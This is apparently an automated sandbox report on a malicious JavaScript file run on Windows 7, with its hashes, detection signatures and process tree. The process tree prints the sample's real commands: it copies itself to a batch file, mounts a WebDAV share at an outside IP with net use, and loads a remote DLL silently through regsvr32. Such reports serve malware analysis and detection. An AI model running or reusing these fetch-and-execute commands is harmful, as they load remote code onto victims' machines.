Overview

overview

7

Static

static

1

3184579182...556.js

windows7-x64

3

3184579182...556.js

windows10-2004-x64

7

Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    09/07/2024, 06:12 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3184579182140121556.js

  • Size

    5KB

  • MD5

    a3a26691f23f506be74e72a6dc740959

  • SHA1

    68d5263d0ffbec81e72c555a2f5a1ff911229676

  • SHA256

    accbf5224b6054b92773326c22c560eec52d5302536bf9809c62810f59694fba

  • SHA512

    0a5e694d359b435548fe328bfe472115c8bd5a423ba35f4eb905f30f50959c8a8770388902bd642401bdba38916a16cfed68ac40a573629b8f9f99e66b71370e

  • SSDEEP

    96:b4EpzOOolLhgcjGhsmF5lBJ2aIhD7lA+qnkz:EI4ltgcj0sS5lBJ2aIhD7lA3nkz

Score
3/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\3184579182140121556.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\3184579182140121556.js" "C:\Users\Admin\\lbdupt.bat" && "C:\Users\Admin\\lbdupt.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\system32\net.exe
        net use \\45.9.74.13@8888\DavWWWRoot\
        3⤵
          PID:2728
        • C:\Windows\system32\regsvr32.exe
          regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\890.dll
          3⤵
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2588

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\lbdupt.bat
      Filesize

      5KB

      MD5

      a3a26691f23f506be74e72a6dc740959

      SHA1

      68d5263d0ffbec81e72c555a2f5a1ff911229676

      SHA256

      accbf5224b6054b92773326c22c560eec52d5302536bf9809c62810f59694fba

      SHA512

      0a5e694d359b435548fe328bfe472115c8bd5a423ba35f4eb905f30f50959c8a8770388902bd642401bdba38916a16cfed68ac40a573629b8f9f99e66b71370e

      Download Submit

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.